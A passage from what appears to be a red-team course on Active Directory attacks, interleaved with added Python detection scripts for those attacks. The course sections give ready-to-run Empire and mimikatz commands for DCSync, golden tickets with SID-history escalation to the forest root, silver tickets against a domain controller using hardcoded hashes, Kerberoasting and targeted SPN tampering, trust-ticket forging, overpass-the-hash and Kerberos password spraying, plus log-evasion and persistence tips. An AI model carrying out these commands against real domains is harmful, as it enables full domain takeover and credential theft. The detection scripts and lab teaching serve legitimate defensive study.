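    for text in events:
        ev = parse_4662(text)
        rights = [REPLICATION_RIGHTS[g] for g in ev["guids"] if g in REPLICATION_RIGHTS]
        if not rights or not ev["access_mask"] & CONTROL_ACCESS:
            continue                               # ordinary attribute access, not replication
        if ev["account"] in dc_accounts or ev["account"] in allowlist:
            continue                               # DCs replicate all day; sync accounts are known
        alerts.append((ev["account"], rights))
    return alerts


# Constructed sample 4662 messages (not captured from the course lab).
SAMPLE_4662 = [
    # employee4 pulling the domain naming context with Get-Changes-All: the delegated-rights DCSync
    "An operation was performed on an object.\nSubject :\n\tAccount Name:\t\temployee4\n\tAccount Domain:\t\tELS\n"
    "Object:\n\tObject Server:\t\tDS\n\tObject Type:\t\t%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\n"
    "\tObject Name:\t\t%{DC=els,DC=local}\n"
    "Operation:\n\tOperation Type:\t\tObject Access\n\tAccesses:\t\tControl Access\n\tAccess Mask:\t\t0x100\n"
    "\tProperties:\t\tControl Access\n\t\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
    "\t\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}\n",
    # a DC replicating from its partner: expected, not an alert
    "An operation was performed on an object.\nSubject :\n\tAccount Name:\t\tLAB-DC02$\n\tAccount Domain:\t\tELS\n"
    "Object:\n\tObject Server:\t\tDS\n\tObject Name:\t\t%{DC=els,DC=local}\n"
    "Operation:\n\tAccesses:\t\tControl Access\n\tAccess Mask:\t\t0x100\n"
    "\tProperties:\t\tControl Access\n\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
    "\t\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n",
    # employee4 reading an ordinary attribute (constructed property GUID): no replication right involved
    "An operation was performed on an object.\nSubject :\n\tAccount Name:\t\temployee4\n\tAccount Domain:\t\tELS\n"
    "Operation:\n\tAccesses:\t\tRead Property\n\tAccess Mask:\t\t0x10\n"
    "\tProperties:\t\tRead Property\n\t\t{12345678-1234-1234-1234-123456789abc}\n",
]
```

The same GUIDs are what to look for when auditing the domain object’s ACL: any ACE granting them to something other than DCs, Administrators, Domain Admins or Enterprise Admins is the persistence the slide describes.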


Alternative Paths for Credential Extraction

Once a domain is compromised, we are in possession of the KRBTGT account’s password hash. The KRBTGT account is used to encrypt and sign all Kerberos tickets within a domain.

Golden Tickets

Consequently, we can forge Kerberos tickets (TGTs) that can be used to request TGS tickets for any service on any computer in the domain. Those forged TGT tickets are called Golden Tickets.

Figure: Golden Ticket (Forged TGT) Communication (ADSecurity.org). No AS-REQ or AS-REP communication exists with the DC; the Golden Ticket is sent to the DC as part of the TGS-REQ to get a TGS.

Golden Ticket creation requirements:

• Domain Name
• Domain SID
• Domain KRBTGT Account NTLM password hash
• UserID for impersonation


Golden Tickets

Until recently, a Golden Ticket would work only within the domain where it was created. The addition of SID history changed that.

In essence, what SID history brings to the table is the ability to include in a Golden Ticket (or a Silver one) any group in the AD forest and use it for authorization.

So, if for example we manage to extract a child domain’s KRBTGT account password, then, leveraging SID history, we can add the forest Enterprise Admins group to our Golden Ticket. What this essentially means is that our Golden Ticket can be used to compromise any domain in the forest!

Let’s go through the whole procedure, assuming we have already compromised the “ELS-CHILD” domain. We will forge a Golden Ticket and leverage SID history to compromise the parent domain as well.

We have an Empire agent running on the “ELS-Child” domain’s DC. Let’s first get all the trusts for the current domain.
>> usemodule situational_awareness/network/powerview/get_domain_trust

A bidirectional trust exists between ‘els-child.els.local’ and its parent ‘els.local’. Since this is a forest trust, we can leverage our DA credentials in the child domain to compromise the entire forest.
Golden Tickets

In order to leverage SID history, we first need to identify the SID of the parent domain. We can do that by resolving the ELS\krbtgt account to its SID.
>> usemodule management/user_to_sid

Let’s now extract the “ELS-Child” domain’s KRBTGT account password hash, using DCSync.
>> usemodule credentials/mimikatz/dcsync

Now we have everything we need to forge our Golden Ticket. We can forge it as follows, using the powershell/credentials/mimikatz/golden_ticket Empire module:
>> usemodule credentials/mimikatz/golden_ticket

The actual mimikatz command being submitted behind the scenes is similar to the following:
>> kerberos::golden /admin:whatever /domain:child_domain_name /sid:child_domain_SID /sids:parent_domain_SID-519 /krbtgt:child_domain’s_krbtgt_password_hash /startoffset:0 /endin:600 /renewmax:10080 /ptt

We can impersonate any user, existing or non-existing. When /user and /id for a ticket do not match, the ticket will only work for 20 minutes.

The parent domain’s SID is specified with 519 appended. 519 is the Group ID (RID) of “Enterprise Admins”. For your reference, the important Group IDs in AD are:
513: Domain Users
512: Domain Admins
518: Schema Admins
519: Enterprise Admins
520: Group Policy Creator Owners

Empire has saved the “els-child” domain’s KRBTGT account password hash in its credential store. If you don’t like this approach, simply submit the KRBTGT account’s password hash in the “krbtgt” option.

The Golden Ticket is automatically passed, and we can now access the parent domain’s DC.
>> shell dir \\parent_domain’s_DC\C$
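As an added, defender-side example that is not part of the course material, the script below looks at the same three things the forging command above controls (/sids, /endin and /renewmax) from the reviewing side: a PAC whose SID history grants a privileged RID of a different domain, or whose lifetime exceeds the domain Kerberos policy, is a forged-ticket indicator. The `PacClaims` record, the child-domain SID and the field names are assumptions; where a defender obtains the PAC contents (a decoded capture, or the group list of a logon's group-membership audit event) is also assumed. The parent domain SID is the els.local SID used elsewhere in these slides.

```python
"""Review PAC claims for Golden Ticket indicators. Constructed sample data."""
from dataclasses import dataclass, field

# RIDs from the slide, plus 516 which the evasion note on the next slide uses.
WELL_KNOWN_RIDS = {
    512: "Domain Admins",
    513: "Domain Users",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
    520: "Group Policy Creator Owners",
}
PRIVILEGED_RIDS = {512, 516, 518, 519, 520}
ENTERPRISE_DCS_SID = "S-1-5-9"   # well-known "Enterprise Domain Controllers" SID

# Default domain Kerberos policy: TGT lifetime 10 hours, renewal 7 days.
DEFAULT_MAX_TGT_MINUTES = 600
DEFAULT_MAX_RENEW_MINUTES = 10080


def split_sid(sid: str):
    """Split S-1-5-21-a-b-c-RID into (domain_sid, rid); other SIDs get rid None."""
    parts = sid.split("-")
    if sid.startswith("S-1-5-21-") and len(parts) == 8:
        return "-".join(parts[:7]), int(parts[7])
    return sid, None


@dataclass
class PacClaims:
    domain_sid: str                                   # issuing domain
    user_rid: int                                     # impersonated user
    extra_sids: list = field(default_factory=list)    # SID history / ExtraSids
    lifetime_minutes: int = DEFAULT_MAX_TGT_MINUTES
    renew_minutes: int = DEFAULT_MAX_RENEW_MINUTES


def forged_ticket_indicators(pac: PacClaims,
                             max_tgt: int = DEFAULT_MAX_TGT_MINUTES,
                             max_renew: int = DEFAULT_MAX_RENEW_MINUTES) -> list[str]:
    """Human-readable reasons this ticket deserves a closer look."""
    findings = []
    for sid in pac.extra_sids:
        dom, rid = split_sid(sid)
        if sid == ENTERPRISE_DCS_SID:
            findings.append("extra SID claims Enterprise Domain Controllers membership")
        elif dom != pac.domain_sid and rid in PRIVILEGED_RIDS:
            findings.append(
                f"SID history grants {WELL_KNOWN_RIDS[rid]} (RID {rid}) of foreign domain {dom}")
    if pac.lifetime_minutes > max_tgt:
        findings.append(f"ticket lifetime {pac.lifetime_minutes} min exceeds policy {max_tgt}")
    if pac.renew_minutes > max_renew:
        findings.append(f"renewal window {pac.renew_minutes} min exceeds policy {max_renew}")
    return findings


CHILD_SID = "S-1-5-21-1111111111-2222222222-3333333333"    # constructed child domain SID
PARENT_SID = "S-1-5-21-1770822258-1552498733-1961591868"   # els.local SID from the slides

# Ticket built with the options shown on this slide: policy-conformant
# lifetimes, but Enterprise Admins of the parent injected via SID history.
COURSE_STYLE_TICKET = PacClaims(CHILD_SID, 500, [PARENT_SID + "-519"], 600, 10080)

# Ticket with the evasion-note SIDs and a ten-year lifetime.
TEN_YEARS = 10 * 365 * 24 * 60
LONG_LIVED_TICKET = PacClaims(CHILD_SID, 500, [PARENT_SID + "-516", ENTERPRISE_DCS_SID],
                              TEN_YEARS, TEN_YEARS)

if __name__ == "__main__":
    for name, pac in (("course", COURSE_STYLE_TICKET), ("long-lived", LONG_LIVED_TICKET)):
        print(name, forged_ticket_indicators(pac) or "no findings")
```

The lifetime check only bites when the forging tool keeps its long default; the command on this slide deliberately sets /endin and /renewmax to the policy values, which is why the SID-history check is the one that still fires for it.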


Golden Tickets

Evasion Note:
Be aware that the execution of DCSync causes some log entries. To not create any additional noise while compromising the parent domain (DCSyncing against the parent), we can use inside the “ExtraSids (sids)” option the ‘Domain Controllers’ SID of the parent domain and the ‘Enterprise Domain Controllers’ SID.

If we would like to completely compromise the parent domain’s DC, we can use the Invoke-DCOM lateral movement method.
>> usemodule lateral_movement/invoke_dcom

Through Invoke-DCOM we can invoke commands on remote hosts via the MMC20.Application COM object over DCOM.


Kerberoast

Once we have a list of Service Principal Names (SPNs) associated with service accounts, these SPNs can be used to request Kerberos TGS service tickets. What we can do with those tickets is try to crack them offline. This credential-extraction procedure against service accounts is known as Kerberoasting.

Kerberoasting can be performed by a regular user without sending any suspicious traffic to the target system. This attack is usually effective due to weak domain password policies. Most service account passwords are the same length as the domain password minimum.

Taking into consideration that service accounts are usually over-permissioned and oftentimes members of the Domain Admins group, you can understand how devastating a successful Kerberoasting attack can be.

To sum up, the steps are the following.

1. Request a TGS for the SPN of the target service account (a valid user TGT is required).
2. The DC encrypts the ticket using the service account associated with the specified SPN and sends back a TGS.
3. The encryption type of the requested Kerberos service ticket is RC4_HMAC_MD5. As we mentioned before, RC4_HMAC_MD5 means that the service ticket is encrypted using the service account’s NTLM password hash.

We will attempt to open the acquired ticket(s) by trying numerous NTLM hashes. If a ticket is opened, this means that we have identified the service account’s password.


Kerberoast

Let’s see what Kerberoasting looks like in our testing “ELS” domain. Suppose we have compromised an unprivileged user. Our next step, inside Empire, will be the following.
>> usemodule credentials/invoke_kerberoast

All we have to do now is save this ticket to a file and run JtR against it, as follows. Note that we are using JtR from this repository.
>> ./john --format=krb5tgs path_to_ticket path_to_wordlist

Figure: we were able to identify the service’s password.

If you would like to perform Kerberoasting manually, then you would have to manually request a TGS for an SPN.
PS >> Add-Type -AssemblyName System.IdentityModel
PS >> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DATABASESERVER.eLS.local:1433'

Then, use mimikatz’s “kerberos::list /export” command and finally run tgsrepcrack.py against the exported ticket.

Also be aware that if you compromise a user that has GenericWrite/GenericAll DACL rights over a target, then instead of force-resetting the target’s password, what you can do is use PowerView to change the target’s SPN to any value, perform Kerberoasting against the service ticket and finally repair the SPN.

This concept is known as targeted Kerberoasting and can be executed as follows, using PowerView functionality.
>> Get-DomainUser target | Select serviceprincipalname
>> Set-DomainObject -Identity target -SET @{serviceprincipalname='whatever/anything'}
>> $User = Get-DomainUser target
>> $User | Get-DomainSPNTicket | fl
>> $User | Select serviceprincipalname
>> Set-DomainObject -Identity target -Clear serviceprincipalname
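As an added, defender-side example that is not part of the course material, the script below implements two detections for the Kerberoasting activity described in this section, run over constructed events. The first works on Event 4769 (a Kerberos service ticket was requested): a Kerberoasting run is a burst of RC4-encrypted (TicketEncryptionType 0x17) ticket requests from one user for many distinct user-account SPNs. The second targets the "change the SPN, roast, repair the SPN" sequence of targeted Kerberoasting using Event 5136 (directory object modified): a servicePrincipalName value added and then deleted on the same object by the same actor shortly afterwards. The record types, thresholds and account names are assumptions.

```python
"""Kerberoasting detections over constructed 4769 and 5136 samples."""
from collections import defaultdict
from dataclasses import dataclass

RC4_HMAC = 0x17   # TicketEncryptionType of an RC4_HMAC_MD5 service ticket


@dataclass
class TgsRequest:          # subset of Event 4769 fields
    time: int              # seconds (constructed clock)
    user: str              # TargetUserName of the requesting account
    service: str           # ServiceName the ticket was requested for
    etype: int             # TicketEncryptionType


def kerberoast_suspects(events, window_s=300, min_spns=3):
    """Users who requested RC4 tickets for >= min_spns distinct non-machine
    services within any window_s-second window. Machine accounts ($) and
    krbtgt are excluded: their keys are random and are not roasting targets."""
    per_user = defaultdict(list)
    for ev in events:
        if ev.etype != RC4_HMAC or ev.service.endswith("$") or ev.service.lower() == "krbtgt":
            continue
        per_user[ev.user].append(ev)
    suspects = {}
    for user, evs in per_user.items():
        evs.sort(key=lambda e: e.time)
        for i, start in enumerate(evs):
            names = {e.service for e in evs[i:] if e.time - start.time <= window_s}
            if len(names) >= min_spns:
                suspects[user] = sorted(names)
                break
    return suspects


@dataclass
class DirectoryChange:     # subset of Event 5136 fields
    time: int
    actor: str             # SubjectUserName who made the change
    target_dn: str         # ObjectDN
    attribute: str         # AttributeLDAPDisplayName
    operation: str         # "added" (Value Added) or "deleted" (Value Deleted)
    value: str             # AttributeValue


def spn_tampering(changes, max_gap_s=900):
    """(actor, target_dn, spn) tuples where an SPN value was added and then
    removed from the same object by the same actor within max_gap_s seconds."""
    adds, hits = {}, []
    for ch in sorted(changes, key=lambda c: c.time):
        if ch.attribute.lower() != "serviceprincipalname":
            continue
        key = (ch.actor, ch.target_dn, ch.value)
        if ch.operation == "added":
            adds[key] = ch.time
        elif ch.operation == "deleted" and key in adds and ch.time - adds[key] <= max_gap_s:
            hits.append(key)
    return hits


# Constructed samples: one roasting burst, one machine SPN, normal AES use.
SAMPLE_TGS = [
    TgsRequest(0,  "employee4", "appsvc",    RC4_HMAC),
    TgsRequest(2,  "employee4", "sqlsvc",    RC4_HMAC),
    TgsRequest(5,  "employee4", "backupsvc", RC4_HMAC),
    TgsRequest(30, "employee4", "LAB-FS01$", RC4_HMAC),   # machine account, ignored
    TgsRequest(40, "employee9", "appsvc",    0x12),       # AES256, ordinary access
    TgsRequest(90, "employee9", "krbtgt",    RC4_HMAC),   # TGT renewal, ignored
]
TARGET_DN = "CN=target,CN=Users,DC=els,DC=local"
SAMPLE_CHANGES = [
    DirectoryChange(100, "employee4", TARGET_DN, "servicePrincipalName", "added", "whatever/anything"),
    DirectoryChange(400, "employee4", TARGET_DN, "servicePrincipalName", "deleted", "whatever/anything"),
    DirectoryChange(500, "svc-admin", "CN=SQL01,CN=Computers,DC=els,DC=local",
                    "servicePrincipalName", "added", "MSSQLSvc/sql01.els.local:1433"),
]

if __name__ == "__main__":
    print(kerberoast_suspects(SAMPLE_TGS))
    print(spn_tampering(SAMPLE_CHANGES))
```

Both detections need auditing that is not on by default: 4769 requires "Audit Kerberos Service Ticket Operations", and 5136 requires "Audit Directory Service Changes" plus a SACL on the user objects of interest. The RC4 filter is the strongest single signal, since a roasting tool asks for RC4 explicitly while a modern client would negotiate AES for the same SPN.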


Silver Tickets

Let us now examine the specifics and usage of Silver Tickets. The Silver Tickets’ scope is limited, but they are a lot stealthier than their golden counterparts. Let’s start by describing what a Silver Ticket is.

A Silver Ticket is actually a valid TGS ticket. This valid TGS is forged, so no communication with the DC occurs.

A Silver Ticket is encrypted/signed by the service account. For the encryption/signing, a computer account credential or a service account credential can be used.

A Silver Ticket works only against a targeted service on a specific server. Additionally, the vast majority of services do not perform PAC validation. It is therefore possible for a Silver Ticket to include a PAC whose contents are never checked against the DC.

The requirements for Silver Ticket creation are:

➢ A service account’s password hash, if the targeted service operates under a user account (such a hash can be acquired using Kerberoast).
➢ A computer account’s password hash, if the targeted service is hosted by a computer (such a hash can be acquired using mimikatz).

Figure: Silver Ticket (Forged TGS) Communication (ADSecurity.org). No communication with the DC at all: steps 1 & 2 (AS-REQ / AS-REP) and steps 3 & 4 (TGS-REQ / TGS-REP) are missing.

What is interesting about a Silver Ticket is that, if we, as simulated attackers, get the password data for a service running on a server, we can generate a Silver Ticket for that service without communicating with the DC at all. If an organization is pulling security events mainly off their DCs, they are probably going to miss this.
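As an added, defender-side example that is not part of the course material, the script below turns the observation above into a check: a Silver Ticket produces a Kerberos network logon on the member server (Event 4624, logon type 3, authentication package Kerberos) for which no DC ever logged a service-ticket request (Event 4769). Correlating host logons against DC ticket requests, allowing for the ticket's possible lifetime, surfaces the logons that no DC can account for. The record types, the host names and the `spn_map` (which user accounts hold SPNs on which host) are assumptions; all events are constructed.

```python
"""Find Kerberos logons on member servers with no matching DC ticket request."""
from dataclasses import dataclass


@dataclass
class HostLogon:           # subset of Event 4624 on the member server
    time: int              # seconds (constructed clock)
    host: str              # server that recorded the logon
    user: str              # TargetUserName
    auth_package: str      # AuthenticationPackageName: "Kerberos" or "NTLM"
    logon_type: int        # 3 = network


@dataclass
class DcTgsRequest:        # subset of Event 4769 on a DC
    time: int
    user: str              # TargetUserName, logged as user@REALM
    service: str           # ServiceName, e.g. "LAB-FS01$" or "appsvc"


def service_accounts_for(host: str, spn_map: dict) -> set:
    """Accounts whose keys can decrypt tickets for this host: the computer
    account itself plus any user account holding an SPN on it (lower-cased)."""
    accounts = {host.upper() + "$"} | set(spn_map.get(host.upper(), set()))
    return {a.lower() for a in accounts}


def logons_without_tgs(logons, tgs_requests, spn_map, max_age_s=36000):
    """Kerberos network logons for which no DC issued a service ticket to the
    same user, for an account serving that host, within max_age_s seconds
    before the logon (default 10 h, the maximum service ticket lifetime)."""
    unexplained = []
    for lg in logons:
        if lg.auth_package.lower() != "kerberos" or lg.logon_type != 3:
            continue
        accounts = service_accounts_for(lg.host, spn_map)
        explained = any(
            t.user.split("@")[0].lower() == lg.user.lower()
            and t.service.lower() in accounts
            and 0 <= lg.time - t.time <= max_age_s
            for t in tgs_requests)
        if not explained:
            unexplained.append((lg.host, lg.user, lg.time))
    return unexplained


# Constructed sample: the MSSQL host from these slides runs under "appsvc".
SPN_MAP = {"DATABASESERVER": {"appsvc"}}
SAMPLE_LOGONS = [
    HostLogon(1200, "DATABASESERVER", "employee2", "Kerberos", 3),   # has a 4769
    HostLogon(5000, "LAB-DC01", "Administrator", "Kerberos", 3),     # no 4769 anywhere
    HostLogon(5100, "LAB-FS01", "employee3", "NTLM", 3),             # not Kerberos, skipped
]
SAMPLE_TGS = [
    DcTgsRequest(1000, "employee2@ELS.LOCAL", "appsvc"),
    DcTgsRequest(4000, "employee2@ELS.LOCAL", "LAB-FS01$"),
]

if __name__ == "__main__":
    for host, user, when in logons_without_tgs(SAMPLE_LOGONS, SAMPLE_TGS, SPN_MAP):
        print(f"{user} logged on to {host} at t={when} with a ticket no DC issued")
```

The check is only as good as the completeness of the 4769 feed: every DC in the domain has to forward its events, otherwise ordinary logons show up as unexplained. In practice it is most useful scoped to high-value hosts such as DCs, exactly the case the following slides describe.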


Silver Tickets

Let’s now see how a Silver Ticket is created. Suppose we compromised a domain user, elevated our privileges, used Kerberoast and got the password hash of the service account under which MSSQL was operating.

This service account’s password hash does not provide us with any access to the underlying database(s). So, let’s create a Silver Ticket for the MSSQLSvc SPN through an Empire agent, as follows.
>> usemodule credentials/mimikatz/command
>> set Command kerberos::golden /sid:S-1-5-21-1770822258-1552498733-1961591868 /domain:els.local /target:databaseserver.els.local:1433 /service:MSSQLSvc /rc4:7142273fa7d01a6d919e584f9668e43e /user:appsvc /ptt

With the Silver Ticket passed into the compromised machine, we can now interact with the database. To be more precise, we can interact with the database as a DBA.


Silver Tickets

Additionally, there is a scenario where Silver Tickets are more dangerous than golden ones. As we mentioned earlier, for Silver Ticket creation we can also use a computer account’s password hash.

In a breach recovery scenario where an attacker has dumped everything and the IT department goes through changing all the account passwords, the item that usually gets missed is the computer account passwords.

A machine’s computer account password is used to encrypt service tickets for services running on that machine. Consequently, if we have the computer account password of a DC, we can create service tickets for all running services on that DC, stating “We are a domain admin”…

For example, let’s suppose that we have previously compromised the entire domain and the IT department changed every account but neglected to change the computer account passwords. We still have the DC’s computer account password.

What we can do to re-compromise the DC in a stealthy manner is create two Silver Tickets, one for the ‘http’ service and one for the ‘wsman’ service.

Let’s execute the below in any domain-joined system that we left as a backdoor to the network, through mimikatz.
>> kerberos::golden /sid:S-1-5-21-1770822258-1552498733-1961591868 /domain:els.local /target:lab-dc01.els.local /service:http /rc4:6cc5b7c69e11f4a2d3814ed4dcf70483 /user:Administrator /ptt
>> kerberos::golden /sid:S-1-5-21-1770822258-1552498733-1961591868 /domain:els.local /target:lab-dc01.els.local /service:wsman /rc4:6cc5b7c69e11f4a2d3814ed4dcf70483 /user:Administrator /ptt

If we pass those two tickets, we will gain admin rights to WinRM or PowerShell Remoting on the DC.

Figure: we were able to connect to the DC using PS Remoting, from inside the backdoored user’s workstation.

Notes:
• By default, computer account passwords change every 30 days, and two passwords are stored on the computer.
• PAC validation wouldn’t be useful in this case since the targeted services are system services.


Trust Tickets

When a trust is created, there’s a shared password called the inter-realm key. This exists for all trusts, regardless of whether they were created by an admin or automatically when adding a new domain to an AD forest.

Figure: Kerberos authentication in a cross-domain/forest situation (ADSecurity.org).

A user in the blue domain is already logged on and wants to access a resource in the green domain, across the trust. The DC in the blue domain creates and sends a new TGT to the user, along with the referral to the green domain DC.

This cross-trust TGT is formatted in the same way as any TGT, BUT it is not signed by the KRBTGT account of either of these domains. It’s signed and encrypted with the inter-realm key of the forest trust.

If we can get access to this trust password, then we can forge this cross-domain ticket. This means that we can impersonate any user in the blue domain and get access to any service or resource in the green domain that has been permissioned for the blue domain.

How to forge a Trust Ticket for an external trust to the AD forest

The trust key can be extracted when dumping AD credentials. Each trust has an associated account that contains the trust NTLM password hash. This is what we will use to forge Trust Tickets. The command we will use is:
>> kerberos::golden /domain:current_domain /sid:current_domain’s_SID /rc4:trust_password_NTLM_hash /user:Administrator /service:krbtgt /target:external_domain_FQDN /ticket:path_to_save_the_TGS

Once the trust ticket is created, we can use kekeo’s asktgs to get a TGS for any targeted service in the external domain. For example, for the cifs service we would execute:
>> .\asktgs path_of_the_trust_ticket cifs/domain_controller_of_external_domain

If we now inject that TGS using kekeo’s Kirbikator, we will be able to access the targeted service on the external domain.
>> .\Kirbikator lsa path_to_TGS

It should be noted that the targeted domain must have explicit permissions set for groups or users in the trusted domain, something which is not uncommon.

How to forge a Trust Ticket for an internal trust to the AD forest

Mimikatz can also extract all internal trust password data from an AD domain. For example, we would execute the following when interacting with a PowerShell Empire agent to extract all internal trust password data.
>> usemodule credentials/mimikatz/command
>> set Command lsadump::trust /patch

Figure: Mimikatz patches the LSASS process.

We can use this trust NTLM password to forge a trust ticket and compromise the parent. To forge a trust ticket for an internal trust, you can follow the same procedure we used for an external trust.


Kerberos tickets when NTLM is disabled

To conclude the Kerberos tickets subject: if you happen to be in possession of a valid password but NTLM is disabled, you can configure Kerberos on your attacking machine to check out a TGT.

One way to do this is the following, using impacket. Suppose we identified the ‘2ndAdmin’ user’s credentials.
>> kinit [email protected]
>> KRB5CCNAME=/tmp/krb5cc_0 python wmiexec.py -k -no-pass els.local/[email protected]

-k indicates that we are using Kerberos authentication (i.e. the TGT we created with the kinit command).

If you happen to be in possession of a valid password hash and NTLM is disabled, you can OverPass-the-Hash as follows.
>> ktutil -k ~/mykeys add -p [email protected] -e arcfour-hmac-md5 -w 49623ccc820122ab49b3f0f571b77186 --hex -V 5
>> kinit -t ~/mykeys [email protected]
>> KRB5CCNAME=/tmp/krb5cc_0 python wmiexec.py -k -no-pass els.local/[email protected]

This switches the NTLM password hash of the 2ndAdmin user into a Kerberos ticket.

Password spraying using Kerberos

Finally, if you perform password spraying over SMB (for example via Metasploit’s smb_login module), chances are you will get caught. Kerberos is stealthier for that. You can use Kerberos for password spraying using this script.
>> ./kinit_user_brute.sh domain domain_controller username_list password
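As an added, defender-side example that is not part of the course material: a Kerberos-based spray is quieter than SMB only if nobody is reading the KDC's own audit trail. Each bad password against an existing account produces Event 4771 (Kerberos pre-authentication failed) with status 0x18 on the DC, and each attempt against a non-existent principal produces a failed Event 4768 with result code 0x6, so one client address touching many distinct accounts in a short window is the signal. The script below (record type, thresholds, addresses and account names are assumptions; events are constructed) separates the spray from a single user's typo and reports username enumeration as well.

```python
"""Kerberos password-spray and user-enumeration detection over constructed
4771/4768 failure events."""
from collections import defaultdict
from dataclasses import dataclass

KDC_ERR_PREAUTH_FAILED = 0x18        # bad password, account exists (Event 4771)
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x06   # no such principal (failed Event 4768)


@dataclass
class KerberosFailure:
    time: int          # seconds (constructed clock)
    event_id: int      # 4771 or 4768
    user: str          # TargetUserName
    source_ip: str     # IpAddress / Client Address
    status: int        # Status (4771) or Result Code (4768)


def spray_sources(events, window_s=600, min_accounts=5):
    """Client addresses that failed pre-auth for >= min_accounts distinct
    existing accounts inside any window_s-second window; {ip: accounts}."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev.status == KDC_ERR_PREAUTH_FAILED:
            by_ip[ev.source_ip].append(ev)
    result = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e.time)
        for i, start in enumerate(evs):
            names = {e.user.lower() for e in evs[i:] if e.time - start.time <= window_s}
            if len(names) >= min_accounts:
                result[ip] = sorted(names)
                break
    return result


def enumeration_sources(events, min_unknown=3):
    """Client addresses that asked for TGTs of >= min_unknown distinct
    non-existent principals: the name-guessing phase before a spray."""
    unknown = defaultdict(set)
    for ev in events:
        if ev.status == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[ev.source_ip].add(ev.user.lower())
    return {ip: sorted(u) for ip, u in unknown.items() if len(u) >= min_unknown}


# Constructed sample: one host sprays five accounts and probes three names
# that do not exist; a workstation elsewhere records a single typo.
SAMPLE_FAILURES = [
    KerberosFailure(0, 4771, "employee1", "10.10.10.5", KDC_ERR_PREAUTH_FAILED),
    KerberosFailure(1, 4771, "employee2", "10.10.10.5", KDC_ERR_PREAUTH_FAILED),
    KerberosFailure(2, 4771, "employee3", "10.10.10.5", KDC_ERR_PREAUTH_FAILED),
    KerberosFailure(3, 4771, "employee4", "10.10.10.5", KDC_ERR_PREAUTH_FAILED),
    KerberosFailure(4, 4771, "employee5", "10.10.10.5", KDC_ERR_PREAUTH_FAILED),
    KerberosFailure(5, 4768, "jsmith", "10.10.10.5", KDC_ERR_C_PRINCIPAL_UNKNOWN),
    KerberosFailure(6, 4768, "mjones", "10.10.10.5", KDC_ERR_C_PRINCIPAL_UNKNOWN),
    KerberosFailure(7, 4768, "tdoe", "10.10.10.5", KDC_ERR_C_PRINCIPAL_UNKNOWN),
    KerberosFailure(50, 4771, "employee2", "10.10.20.7", KDC_ERR_PREAUTH_FAILED),
]

if __name__ == "__main__":
    print("spraying:", spray_sources(SAMPLE_FAILURES))
    print("enumerating:", enumeration_sources(SAMPLE_FAILURES))
```

Because a spray tries one password per account, no account reaches its lockout threshold and 4740 never fires; the per-source, many-accounts view is what catches it. The thresholds should be tuned below the organisation's lockout policy so that a spray designed to stay under it is still seen.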


Persisting in Active Directory

There are numerous ways in which an attacker can persist in Active Directory. Actually, a large percentage of the AD attacks we covered can be used for persistence. We suggest that you use persistence methods that involve ACL backdooring, editing existing GPOs or, even better, editing user objects.

The choice is yours…

References

• Making a State-Backed Implant Invisible
• Kerberos Explained
• RADIUS
• SSO
• LDAP
• NTLM
• Kerberos Authentication Overview
• Replay Attacks
• Pass-the-Ticket
• Over-pass-the-Hash
• Kerberoast
• Forged Tickets – Golden/Silver
• Diamond PAC
• MS14-068
• Skeleton Key
• Understanding Active Directory
• Active Directory Security
• Windows Server 2012 R2 Inside Out: Active Directory Architecture
• Active Directory Architecture
• intercepter-ng
• Group Policy
• Are you really protected against Group Policy SYSVOL Bypass and Remote Code Execution?
• Cain
• APR - ADP
• Seth
• passwordless RDP session hijacking
• PCredz
• Responder
• snarf
• AppLocker
• Device Guard with UMCI bypasses AMSI, using reflection
• WMF5 AMSI and autologging bypass
• Bypassing AMSI using PowerShell 5 DLL Hijacking
• Bypass via COM hijacking
• PSAmsi
• Invoke-AmsiBypass.ps1
• How to Bypass Application Whitelisting and Constrained PowerShell
• PS-Attack
• Exploiting PowerShell Code Injection to Bypass Constrained Language Mode
• PyKEK
• kekeo suite
• MS14-068 and KrbCredExport
• Kinit_user_bruter.sh
• S4U2Pwnage
• Pass-the-Hash is Dead: Long Live LocalAccountTokenFilterPolicy
• Group Policy Preference
• 2.2.1.1.4 Password Encryption
• JtR
• tgsrepcrack.py
• Still Passing the Hash 15 Years Later